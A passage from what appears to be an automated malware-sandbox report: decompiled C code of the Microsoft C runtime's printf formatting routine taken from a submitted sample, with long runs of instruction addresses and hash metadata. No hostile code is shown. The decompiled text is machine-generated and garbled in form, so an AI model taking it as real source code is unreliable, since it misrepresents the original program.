                            														return E00416CA0(_t518, _t589,  *(_t701 - 0x48) ^ _t701, _t665, _t699, _t700);
                            													}
                            												}
                            											}
                            											L219:
                            											__eflags =  *(_t701 - 0x25c);
                            											if( *(_t701 - 0x25c) == 0) {
                            												L222:
                            												 *(_t701 - 0x334) = 1;
                            												L223:
                            												_t605 =  *(_t701 - 0x334);
                            												 *(_t701 - 0x2e0) =  *(_t701 - 0x334);
                            												__eflags =  *(_t701 - 0x2e0);
                            												if( *(_t701 - 0x2e0) == 0) {
                            													_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            													_push(0);
                            													_push(0x8f5);
                            													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            													_push(2);
                            													_t523 = L0040E1A0();
                            													_t703 = _t703 + 0x14;
                            													__eflags = _t523 - 1;
                            													if(_t523 == 1) {
                            														asm("int3");
                            													}
                            												}
                            												__eflags =  *(_t701 - 0x2e0);
                            												if( *(_t701 - 0x2e0) != 0) {
                            													 *(_t701 - 0x300) =  *(_t701 - 0x24c);
                            													E0040D380(_t701 - 0x40);
                            													_t518 =  *(_t701 - 0x300);
                            												} else {
                            													 *((intOrPtr*)(L0040EC70(_t605))) = 0x16;
                            													E00411A50(_t589, _t605, _t699, _t700, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            													 *(_t701 - 0x2fc) = 0xffffffff;
                            													E0040D380(_t701 - 0x40);
                            													_t518 =  *(_t701 - 0x2fc);
                            												}
                            												goto L229;
                            											}
                            											L220:
                            											__eflags =  *(_t701 - 0x25c) - 7;
                            											if( *(_t701 - 0x25c) == 7) {
                            												goto L222;
                            											}
                            											L221:
                            											 *(_t701 - 0x334) = 0;
                            											goto L223;
                            										}
                            									}
                            									L187:
                            									__eflags =  *(_t701 - 0x24);
                            									if( *(_t701 - 0x24) == 0) {
                            										L189:
                            										 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
                            										 *((char*)( *((intOrPtr*)(_t701 - 4)))) = 0x30;
                            										_t639 =  *(_t701 - 0x24) + 1;
                            										__eflags = _t639;
                            										 *(_t701 - 0x24) = _t639;
                            										goto L190;
                            									}
                            									L188:
                            									__eflags =  *((char*)( *((intOrPtr*)(_t701 - 4)))) - 0x30;
                            									if( *((char*)( *((intOrPtr*)(_t701 - 4)))) == 0x30) {
                            										goto L190;
                            									}
                            									goto L189;
                            								}
                            								L183:
                            								asm("cdq");
                            								_t658 =  *(_t701 - 0x2c0);
                            								 *(_t701 - 0x2ac) = E0041CE40(_t658,  *(_t701 - 0x2bc),  *(_t701 - 8), _t657) + 0x30;
                            								asm("cdq");
                            								 *(_t701 - 0x2c0) = E0041CDD0( *(_t701 - 0x2c0),  *(_t701 - 0x2bc),  *(_t701 - 8), _t658);
                            								 *(_t701 - 0x2bc) = _t658;
                            								__eflags =  *(_t701 - 0x2ac) - 0x39;
                            								if( *(_t701 - 0x2ac) > 0x39) {
                            									_t662 =  *(_t701 - 0x2ac) +  *((intOrPtr*)(_t701 - 0x260));
                            									__eflags = _t662;
                            									 *(_t701 - 0x2ac) = _t662;
                            								}
                            								 *((char*)( *((intOrPtr*)(_t701 - 4)))) =  *(_t701 - 0x2ac);
                            								 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
                            								L181:
                            								_t657 =  *(_t701 - 0x30) - 1;
                            								 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
                            								__eflags =  *(_t701 - 0x30);
                            								if( *(_t701 - 0x30) > 0) {
                            									goto L183;
                            								}
                            								goto L182;
                            							}
                            						}
                            						L168:
                            						__eflags =  *(_t701 - 0x2b8);
                            						if( *(_t701 - 0x2b8) >= 0) {
                            							goto L170;
                            						}
                            						goto L169;
                            						L170:
                            						 *(_t701 - 0x2c0) =  *(_t701 - 0x2b8);
                            						 *(_t701 - 0x2bc) =  *(_t701 - 0x2b4);
                            						goto L171;
                            					}
                            				}
                            			}




























                            0x0042205c
                            0x0042205c
                            0x0042205c
                            0x0042205c
                            0x0042205c
                            0x0042205c
                            0x0042205c
                            0x0042206c
                            0x0042206e
                            0x00422071
                            0x00422071
                            0x00422077
                            0x00422077
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x0042213a
                            0x0042213f
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211f
                            0x00422124
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f9
                            0x004220fe
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220dd
                            0x004220e2
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220b0
                            0x004220b5
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422088
                            0x0042208d
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00422158
                            0x00422158
                            0x0042215f
                            0x00000000
                            0x00000000
                            0x00422161
                            0x00422161
                            0x0042216c
                            0x0042217a
                            0x0042217f
                            0x00422185
                            0x00422193
                            0x004221b0
                            0x004221b3
                            0x004221b8
                            0x004221bd
                            0x004221c3
                            0x004221d1
                            0x004221d1
                            0x004221da
                            0x004221da
                            0x004221c3
                            0x004221e0
                            0x004221e4
                            0x004221f5
                            0x004221f8
                            0x004221ff
                            0x00422201
                            0x00422201
                            0x004221e6
                            0x004221e6
                            0x004221e6
                            0x0042220e
                            0x00422214
                            0x00422216
                            0x00422216
                            0x00422220
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00422233
                            0x00422239
                            0x0042223f
                            0x004222bc
                            0x004222c2
                            0x004222cb
                            0x004222d1
                            0x004222d7
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x0042230c
                            0x0042230f
                            0x00422312
                            0x00422317
                            0x0042231c
                            0x0042232e
                            0x00422331
                            0x00422343
                            0x00422346
                            0x00422348
                            0x0042234c
                            0x0042234c
                            0x00422333
                            0x00422333
                            0x00422337
                            0x00422337
                            0x0042231e
                            0x0042231e
                            0x00422322
                            0x00422322
                            0x0042231c
                            0x0042235c
                            0x00422365
                            0x00422368
                            0x0042237e
                            0x00422383
                            0x00422383
                            0x00422399
                            0x0042239e
                            0x004223a4
                            0x004223a7
                            0x004223ac
                            0x004223af
                            0x004223c5
                            0x004223ca
                            0x004223ca
                            0x004223af
                            0x004223cd
                            0x004223d1
                            0x004224a5
                            0x004224b8
                            0x004224bd
                            0x00000000
                            0x004223d7
                            0x004223d7
                            0x004223d7
                            0x004223db
                            0x00000000
                            0x00000000
                            0x004223e1
                            0x004223e1
                            0x004223ee
                            0x004223f7
                            0x004223fd
                            0x004223fd
                            0x0042240c
                            0x00422412
                            0x00422414
                            0x00000000
                            0x00000000
                            0x0042241a
                            0x00422423
                            0x00422442
                            0x00422447
                            0x0042244a
                            0x00422459
                            0x0042245f
                            0x00422466
                            0x00422471
                            0x00422471
                            0x00000000
                            0x00422471
                            0x00422468
                            0x00422468
                            0x0042246f
                            0x0042247d
                            0x00422496
                            0x0042249b
                            0x00000000
                            0x0042249b
                            0x00000000
                            0x0042246f
                            0x004224a3
                            0x004224c0
                            0x004224c0
                            0x004224c7
                            0x004224cc
                            0x004224cf
                            0x004224e5
                            0x004224ea
                            0x004224ea
                            0x004224cf
                            0x004224c7
                            0x004224ed
                            0x004224ed
                            0x004224f1
                            0x004224f9
                            0x004224fe
                            0x00422501
                            0x00422501
                            0x00422508
                            0x00422508
                            0x004215df
                            0x004215e5
                            0x004215f2
                            0x004215f7
                            0x00000000
                            0x0042160a
                            0x00421614
                            0x0042163b
                            0x00421622
                            0x00421633
                            0x00421633
                            0x00421614
                            0x00421645
                            0x0042164b
                            0x00421657
                            0x0042165a
                            0x00421668
                            0x0042166b
                            0x00421678
                            0x0042171d
                            0x00421723
                            0x00421729
                            0x00421730
                            0x00000000
                            0x00000000
                            0x00421736
                            0x0042173c
                            0x00000000
                            0x00421743
                            0x00421743
                            0x0042175b
                            0x00421760
                            0x00421763
                            0x00421765
                            0x0042181f
                            0x00421832
                            0x00421837
                            0x00000000
                            0x0042176b
                            0x0042177e
                            0x00421783
                            0x00421789
                            0x0042178b
                            0x00421794
                            0x00421794
                            0x00421797
                            0x004217a3
                            0x004217a7
                            0x004217ad
                            0x004217af
                            0x004217b4
                            0x004217b6
                            0x004217bb
                            0x004217c0
                            0x004217c2
                            0x004217c7
                            0x004217ca
                            0x004217cd
                            0x004217cf
                            0x004217cf
                            0x004217cd
                            0x004217d0
                            0x004217d0
                            0x004217d7
                            0x00000000
                            0x004217d9
                            0x004217de
                            0x004217fa
                            0x00421802
                            0x0042180f
                            0x00421814
                            0x00000000
                            0x00421814
                            0x004217d7
                            0x00000000
                            0x0042183f
                            0x0042183f
                            0x00421846
                            0x00421849
                            0x0042184c
                            0x0042184f
                            0x00421852
                            0x00421855
                            0x00421858
                            0x0042185f
                            0x00421866
                            0x00000000
                            0x00000000
                            0x00421872
                            0x00421872
                            0x00421879
                            0x00421885
                            0x00421888
                            0x0042188e
                            0x00421895
                            0x00000000
                            0x00000000
                            0x00421897
                            0x00421897
                            0x0042189d
                            0x0042189d
                            0x004218a4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004218e7
                            0x004218e7
                            0x004218ee
                            0x004218f1
                            0x0042191b
                            0x0042191e
                            0x0042191e
                            0x00421921
                            0x00421928
                            0x00421928
                            0x0042192c
                            0x004218f3
                            0x004218f3
                            0x004218ff
                            0x00421902
                            0x00421906
                            0x00421908
                            0x0042190b
                            0x0042190b
                            0x0042190e
                            0x00421914
                            0x00421916
                            0x00421916
                            0x00421919
                            0x00000000
                            0x00000000
                            0x00421934
                            0x00421934
                            0x00000000
                            0x00000000
                            0x00421940
                            0x00421940
                            0x00421947
                            0x0042194a
                            0x0042196a
                            0x0042196d
                            0x0042196d
                            0x00421977
                            0x00421977
                            0x0042197b
                            0x0042194c
                            0x0042194c
                            0x00421958
                            0x0042195b
                            0x0042195f
                            0x00421961
                            0x00421961
                            0x00421968
                            0x00000000
                            0x00000000
                            0x00421983
                            0x00421983
                            0x0042198a
                            0x00421996
                            0x00421999
                            0x0042199f
                            0x004219a6
                            0x00421ab9
                            0x00000000
                            0x00421ab9
                            0x004219ac
                            0x004219ac
                            0x004219b2
                            0x004219b2
                            0x004219b9
                            0x00000000
                            0x004219ef
                            0x004219ef
                            0x004219f2
                            0x004219f5
                            0x004219f8
                            0x00421a20
                            0x00421a20
                            0x00421a23
                            0x00421a26
                            0x00421a29
                            0x00421a4e
                            0x00421a4e
                            0x00421a51
                            0x00421a54
                            0x00421a57
                            0x00421a90
                            0x00421aa1
                            0x00000000
                            0x00421aa1
                            0x00421a59
                            0x00421a59
                            0x00421a5c
                            0x00421a5f
                            0x00421a62
                            0x00000000
                            0x00000000
                            0x00421a64
                            0x00421a64
                            0x00421a67
                            0x00421a6a
                            0x00421a6d
                            0x00000000
                            0x00000000
                            0x00421a6f
                            0x00421a6f
                            0x00421a72
                            0x00421a75
                            0x00421a78
                            0x00000000
                            0x00000000
                            0x00421a7a
                            0x00421a7a
                            0x00421a7d
                            0x00421a80
                            0x00421a83
                            0x00000000
                            0x00000000
                            0x00421a85
                            0x00421a85
                            0x00421a88
                            0x00421a8b
                            0x00421a8e
                            0x00421a92
                            0x00000000
                            0x00421a92
                            0x00000000
                            0x00421a8e
                            0x00421a2b
                            0x00421a2b
                            0x00421a2e
                            0x00421a32
                            0x00421a35
                            0x00000000
                            0x00421a37
                            0x00421a3a
                            0x00421a3d
                            0x00421a40
                            0x00421a43
                            0x00421a49
                            0x00000000
                            0x00421a49
                            0x00421a35
                            0x004219fa
                            0x004219fa
                            0x004219fd
                            0x00421a01
                            0x00421a04
                            0x00000000
                            0x00421a06
                            0x00421a09
                            0x00421a0c
                            0x00421a0f
                            0x00421a12
                            0x00421a18
                            0x00000000
                            0x00421a18
                            0x00000000
                            0x00421aa3
                            0x00421aa6
                            0x00421aa9
                            0x00000000
                            0x00000000
                            0x004219c0
                            0x004219c0
                            0x004219c3
                            0x004219c6
                            0x004219c9
                            0x004219e1
                            0x004219e4
                            0x004219e4
                            0x004219e7
                            0x004219cb
                            0x004219ce
                            0x004219d1
                            0x004219d7
                            0x004219dc
                            0x004219dc
                            0x00000000
                            0x00000000
                            0x00421aae
                            0x00421aae
                            0x00421ab1
                            0x00421ab1
                            0x00421ab6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421abe
                            0x00421abe
                            0x00421ac5
                            0x00421ad1
                            0x00421ad4
                            0x00421ada
                            0x00421ae1
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421ae7
                            0x00421aed
                            0x00421aed
                            0x00421af4
                            0x00000000
                            0x00421e4e
                            0x00421e4e
                            0x00421e55
                            0x00421e5c
                            0x00421e5c
                            0x00421e5f
                            0x00000000
                            0x00000000
                            0x00421afb
                            0x00421afe
                            0x00421afe
                            0x00421b04
                            0x00421b06
                            0x00421b09
                            0x00421b09
                            0x00421b0e
                            0x00421b0e
                            0x00000000
                            0x00000000
                            0x00421c3b
                            0x00421c3e
                            0x00421c3e
                            0x00421c43
                            0x00421c45
                            0x00421c48
                            0x00421c48
                            0x00421c4e
                            0x00421c4e
                            0x00000000
                            0x00000000
                            0x0042201b
                            0x0042201b
                            0x00000000
                            0x00000000
                            0x00421ba5
                            0x00421ba5
                            0x00421bb1
                            0x00421bb7
                            0x00421bbe
                            0x00421bcc
                            0x00421bcc
                            0x00421bd2
                            0x00421bd5
                            0x00421be1
                            0x00421c36
                            0x00000000
                            0x00421c36
                            0x00421bc0
                            0x00421bc0
                            0x00421bc6
                            0x00421bca
                            0x00421be6
                            0x00421be9
                            0x00421be9
                            0x00421bef
                            0x00421c17
                            0x00421c1e
                            0x00421c24
                            0x00421c27
                            0x00421c2a
                            0x00421c30
                            0x00421c33
                            0x00421bf1
                            0x00421bf1
                            0x00421bf7
                            0x00421bfa
                            0x00421bfd
                            0x00421c03
                            0x00421c06
                            0x00421c09
                            0x00421c0b
                            0x00421c0e
                            0x00421c0e
                            0x00000000
                            0x00421bef
                            0x00000000
                            0x00000000
                            0x00421e65
                            0x00421e68
                            0x00421e6b
                            0x00421e6e
                            0x00421e74
                            0x00421e77
                            0x00421e7e
                            0x00421e82
                            0x00421e8d
                            0x00421e8d
                            0x00421e91
                            0x00421ea8
                            0x00421ea8
                            0x00421eaf
                            0x00421eb1
                            0x00421eb1
                            0x00421eb8
                            0x00421eb8
                            0x00421ebf
                            0x00421ed0
                            0x00421edf
                            0x00421ee2
                            0x00421ee6
                            0x00421efc
                            0x00421ee8
                            0x00421ee8
                            0x00421eeb
                            0x00421ef1
                            0x00421ef7
                            0x00421ef7
                            0x00421ee6
                            0x00421f06
                            0x00421f09
                            0x00421f0c
                            0x00421f0f
                            0x00421f12
                            0x00421f15
                            0x00421f1b
                            0x00421f21
                            0x00421f29
                            0x00421f2a
                            0x00421f2d
                            0x00421f2e
                            0x00421f31
                            0x00421f32
                            0x00421f39
                            0x00421f3a
                            0x00421f3d
                            0x00421f3e
                            0x00421f41
                            0x00421f42
                            0x00421f48
                            0x00421f49
                            0x00421f57
                            0x00421f59
                            0x00421f5f
                            0x00421f5f
                            0x00421f65
                            0x00421f67
                            0x00421f6b
                            0x00421f6d
                            0x00421f75
                            0x00421f76
                            0x00421f79
                            0x00421f7a
                            0x00421f88
                            0x00421f8a
                            0x00421f8a
                            0x00421f6b
                            0x00421f8d
                            0x00421f94
                            0x00421f97
                            0x00421f9c
                            0x00421f9c
                            0x00421fa2
                            0x00421fa4
                            0x00421fac
                            0x00421fad
                            0x00421fb0
                            0x00421fb1
                            0x00421fc0
                            0x00421fc2
                            0x00421fc2
                            0x00421fa2
                            0x00421fc5
                            0x00421fc8
                            0x00421fcb
                            0x00421fce
                            0x00421fd3
                            0x00421fd9
                            0x00421fdc
                            0x00421fdf
                            0x00421fdf
                            0x00421fe2
                            0x00421fe2
                            0x00421fe5
                            0x00421ff1
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00422302
                            0x00421e93
                            0x00421e93
                            0x00421e9a
                            0x00421e9d
                            0x00000000
                            0x00000000
                            0x00421e9f
                            0x00421e9f
                            0x00000000
                            0x00421e9f
                            0x00421e84
                            0x00421e84
                            0x00000000
                            0x00000000
                            0x00421b11
                            0x00421b14
                            0x00421b14
                            0x00421b1a
                            0x00421b75
                            0x00421b7d
                            0x00421b84
                            0x00421b8a
                            0x00421b90
                            0x00421b1c
                            0x00421b1c
                            0x00421b26
                            0x00421b2a
                            0x00421b32
                            0x00421b39
                            0x00421b46
                            0x00421b4d
                            0x00421b59
                            0x00421b5f
                            0x00421b66
                            0x00421b68
                            0x00421b68
                            0x00421b6f
                            0x00421b97
                            0x00421b9d
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00421ff9
                            0x00421ffc
                            0x00421fff
                            0x00422002
                            0x0042207a
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x0042213a
                            0x0042213f
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211f
                            0x00422124
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f9
                            0x004220fe
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220dd
                            0x004220e2
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220b0
                            0x004220b5
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422088
                            0x0042208d
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00421d57
                            0x00421d57
                            0x00421d63
                            0x00421d69
                            0x00421d6e
                            0x00421d70
                            0x00421e1a
                            0x00421e1d
                            0x00421e1d
                            0x00421e20
                            0x00421e34
                            0x00421e3a
                            0x00421e40
                            0x00421e22
                            0x00421e22
                            0x00421e2f
                            0x00421e2f
                            0x00421e42
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00421d76
                            0x00421d76
                            0x00421d76
                            0x00421d78
                            0x00421d86
                            0x00421d7a
                            0x00421d7a
                            0x00421d7a
                            0x00421d90
                            0x00421d96
                            0x00421d9c
                            0x00421da3
                            0x00421da5
                            0x00421daa
                            0x00421dac
                            0x00421db1
                            0x00421db6
                            0x00421db8
                            0x00421dbd
                            0x00421dc0
                            0x00421dc3
                            0x00421dc5
                            0x00421dc5
                            0x00421dc3
                            0x00421dc6
                            0x00421dcd
                            0x00421e15
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00421dcf
                            0x00421dcf
                            0x00421dd4
                            0x00421df0
                            0x00421df8
                            0x00421e02
                            0x00421e05
                            0x00421e0a
                            0x00000000
                            0x00421e0a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422014
                            0x00422014
                            0x00000000
                            0x00000000
                            0x00421c51
                            0x00421c51
                            0x00421c55
                            0x00421c63
                            0x00421c66
                            0x00421c57
                            0x00421c57
                            0x00421c57
                            0x00421c6c
                            0x00421c72
                            0x00421c78
                            0x00421c84
                            0x00421c8a
                            0x00421c8a
                            0x00421c90
                            0x00421cf7
                            0x00421cf7
                            0x00421cfb
                            0x00421cfd
                            0x00421d03
                            0x00421d03
                            0x00421d06
                            0x00421d09
                            0x00421d0f
                            0x00421d0f
                            0x00421d0f
                            0x00421d1b
                            0x00421d1e
                            0x00421d24
                            0x00421d26
                            0x00000000
                            0x00000000
                            0x00421d28
                            0x00421d28
                            0x00421d2e
                            0x00421d31
                            0x00421d33
                            0x00000000
                            0x00000000
                            0x00421d35
                            0x00421d3b
                            0x00421d3e
                            0x00421d3e
                            0x00421d46
                            0x00421d46
                            0x00421d4c
                            0x00421d4c
                            0x00421d4f
                            0x00000000
                            0x00421c92
                            0x00421c92
                            0x00421c92
                            0x00421c96
                            0x00421c98
                            0x00421c9d
                            0x00421c9d
                            0x00421ca0
                            0x00421ca7
                            0x00421caa
                            0x00421cb0
                            0x00421cb0
                            0x00421cb0
                            0x00421cbc
                            0x00421cbf
                            0x00421cc5
                            0x00421cc7
                            0x00000000
                            0x00000000
                            0x00421cc9
                            0x00421cc9
                            0x00421ccf
                            0x00421cd2
                            0x00421cd4
                            0x00000000
                            0x00000000
                            0x00421cd6
                            0x00421cdc
                            0x00421cdf
                            0x00421cdf
                            0x00421ce7
                            0x00421ced
                            0x00421cf0
                            0x00421cf2
                            0x00421d52
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00000000
                            0x0042200b
                            0x0042200b
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x0042213a
                            0x0042213f
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211f
                            0x00422124
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f9
                            0x004220fe
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220dd
                            0x004220e2
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220b0
                            0x004220b5
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422088
                            0x0042208d
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422156
                            0x00000000
                            0x00422027
                            0x00422027
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x0042207a
                            0x0042207a
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x0042213a
                            0x0042213f
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211f
                            0x00422124
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f9
                            0x004220fe
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220dd
                            0x004220e2
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220b0
                            0x004220b5
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422088
                            0x0042208d
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422156
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422156
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00000000
                            0x004218c1
                            0x004218c4
                            0x004218c7
                            0x00000000
                            0x00000000
                            0x004218cc
                            0x004218cf
                            0x004218d4
                            0x00000000
                            0x00000000
                            0x004218b6
                            0x004218b6
                            0x004218b9
                            0x004218bc
                            0x00000000
                            0x00000000
                            0x004218ab
                            0x004218ae
                            0x004218b1
                            0x00000000
                            0x00000000
                            0x004218d9
                            0x004218d9
                            0x004218dc
                            0x004218dc
                            0x004218df
                            0x00000000
                            0x00000000
                            0x004218e2
                            0x00000000
                            0x00000000
                            0x0042167e
                            0x00421680
                            0x0042168e
                            0x00421682
                            0x00421682
                            0x00421682
                            0x00421698
                            0x0042169e
                            0x004216ab
                            0x004216ad
                            0x004216b2
                            0x004216b4
                            0x004216b9
                            0x004216be
                            0x004216c0
                            0x004216c5
                            0x004216cb
                            0x004216cd
                            0x004216cd
                            0x004216cb
                            0x004216ce
                            0x004216d5
                            0x00000000
                            0x004216d7
                            0x004216dc
                            0x004216f8
                            0x00421700
                            0x0042170d
                            0x00421712
                            0x004225d1
                            0x004225de
                            0x004225de
                            0x004216d5
                            0x00421678
                            0x0042250d
                            0x0042250d
                            0x00422514
                            0x0042252b
                            0x0042252b
                            0x00422535
                            0x00422535
                            0x0042253b
                            0x00422541
                            0x00422548
                            0x0042254a
                            0x0042254f
                            0x00422551
                            0x00422556
                            0x0042255b
                            0x0042255d
                            0x00422562
                            0x00422565
                            0x00422568
                            0x0042256a
                            0x0042256a
                            0x00422568
                            0x0042256b
                            0x00422572
                            0x004225bd
                            0x004225c6
                            0x004225cb
                            0x00422574
                            0x00422579
                            0x00422595
                            0x0042259d
                            0x004225aa
                            0x004225af
                            0x004225af
                            0x00000000
                            0x00422572
                            0x00422516
                            0x00422516
                            0x0042251d
                            0x00000000
                            0x00000000
                            0x0042251f
                            0x0042251f
                            0x00000000
                            0x0042251f
                            0x00422302
                            0x004222d9
                            0x004222d9
                            0x004222dd
                            0x004222ea
                            0x004222f0
                            0x004222f6
                            0x004222fc
                            0x004222fc
                            0x004222ff
                            0x00000000
                            0x004222ff
                            0x004222df
                            0x004222e5
                            0x004222e8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004222e8
                            0x00422241
                            0x00422244
                            0x0042224e
                            0x0042225d
                            0x00422266
                            0x0042227c
                            0x00422282
                            0x00422288
                            0x0042228f
                            0x00422297
                            0x00422297
                            0x0042229d
                            0x0042229d
                            0x004222ac
                            0x004222b4
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422231
                            0x00422223
                            0x00422163
                            0x00422163
                            0x0042216a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422198
                            0x0042219e
                            0x004221aa
                            0x00000000
                            0x004221aa
                            0x0042207a

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __aulldiv__aullrem_get_int64_arg
                            • String ID: 9
                            • API String ID: 3120068967-2366072709
                            • Opcode ID: 790f85329d0675026e3b1e30a5abf80567c16f4c43cd8e8bf9a7b00a4300b363
                            • Instruction ID: 2b4fd159c5947c42750f9cc6a0149795afb4902a1642d007c9234b0f1fe656e7
                            • Opcode Fuzzy Hash: 790f85329d0675026e3b1e30a5abf80567c16f4c43cd8e8bf9a7b00a4300b363
                            • Instruction Fuzzy Hash: F841D2B1E01629EFEB64CF88DD89BAEB7B5BB44300F5085DAD509A7240C7785E81CF54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E00423904(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                            				signed int _t483;
                            				signed int _t502;
                            				void* _t507;
                            				signed int _t509;
                            				void* _t517;
                            				void* _t535;
                            				signed int _t539;
                            				signed int _t552;
                            				signed int _t556;
                            				signed short _t557;
                            				signed int _t560;
                            				signed int _t563;
                            				signed int _t564;
                            				intOrPtr _t565;
                            				signed int _t613;
                            				signed int _t621;
                            				signed int _t623;
                            				signed int _t625;
                            				signed int _t632;
                            				signed int _t636;
                            				signed int _t644;
                            				signed int _t671;
                            				intOrPtr _t672;
                            				intOrPtr _t673;
                            				signed int _t674;
                            				void* _t676;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t673 = __esi;
                            					_t672 = __edi;
                            					_t565 = __ebx;
                            					 *(_t674 - 8) = 8;
                            					if(( *(_t674 - 0x10) & 0x00000080) != 0) {
                            						__edx =  *(__ebp - 0x10);
